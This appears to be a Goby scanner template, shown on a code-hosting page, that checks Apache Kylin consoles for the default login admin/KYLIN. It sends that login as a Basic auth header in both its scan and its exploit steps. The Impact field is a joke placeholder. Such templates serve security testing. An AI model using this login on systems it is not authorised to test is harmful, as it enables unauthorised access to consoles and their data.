Goby/json/Apache Kylin Console ┐╪╓╞╠¿...

76 lines
2.7 KiB
JSON
Raw Normal View History

2022-11-25 02:08:58 -08:00
{
"Name": "Apache Kylin Console 控制台弱口令",
"Level": "2",
"Tags": [
"弱口令"
],
"GobyQuery": "app=\"APACHE-kylin\"",
"Description": "Apache Kylin Console 控制台存在默认弱口令 adminKYLIN可被登录控制台进一步利用其他漏洞",
"Product": "Apache Kylin",
"Homepage": "http://kylin.apache.org/",
"Author": "PeiQi",
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐏</span></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/kylin/api/user/authentication",
"follow_redirect": true,
"header": {
"Authorization": "Basic YWRtaW46S1lMSU4=",
"Cookie": "project=null"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$code",
"operation": "!=",
"value": "401",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/kylin/api/user/authentication",
"follow_redirect": true,
"header": {
"Authorization": "Basic YWRtaW46S1lMSU4=",
"Cookie": "project=null"
},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-01-24 13:23:42",
"GobyVersion": "1.8.237"
}